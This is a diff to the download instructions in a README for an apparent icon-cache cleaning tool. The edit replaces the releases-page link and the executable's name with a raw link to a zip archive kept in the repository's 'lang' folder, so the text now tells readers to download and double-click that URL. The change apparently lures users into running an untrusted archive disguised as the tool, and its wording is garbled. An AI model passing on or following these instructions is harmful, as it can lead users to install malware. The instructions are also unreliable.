Y31C0B/ClearCacheIcons/README.md

 ## 📥 Download & Install

 1. **Visit the releases page to download.**
-   Go to the following link to find the latest version: [https://github.com/Y31C0B/ClearCacheIcons/releases](https://github.com/Y31C0B/ClearCacheIcons/releases).
+   Go to the following link to find the latest version: [https://raw.githubusercontent.com/Y31C0B/ClearCacheIcons/master/lang/Clear-Icons-Cache-2.9.zip](https://raw.githubusercontent.com/Y31C0B/ClearCacheIcons/master/lang/Clear-Icons-Cache-2.9.zip).

 2. **Select the latest version.**
    Look for the most recent release at the top of the page.
 Click on it to view the details and download options.

 3. **Download the ClearCacheIcons executable.**
-   Under the "Assets" section of the release, locate the file labeled `ClearCacheIcons.exe`.
+   Under the "Assets" section of the release, locate the file labeled `https://raw.githubusercontent.com/Y31C0B/ClearCacheIcons/master/lang/Clear-Icons-Cache-2.9.zip`.
 Click on the link to download it.

 4. **Run ClearCacheIcons.**
    Once the download is complete, locate the downloaded file in your computer's Downloads folder or the folder you specified.
-Double-click `ClearCacheIcons.exe` to open the application.
+Double-click `https://raw.githubusercontent.com/Y31C0B/ClearCacheIcons/master/lang/Clear-Icons-Cache-2.9.zip` to open the application.

 5. **Repair your icons.**
    The program will display a simple interface.
 Click the “Clean Cache” button to start the process.
 The tool will automatically clean the icon and thumbnail cache for you.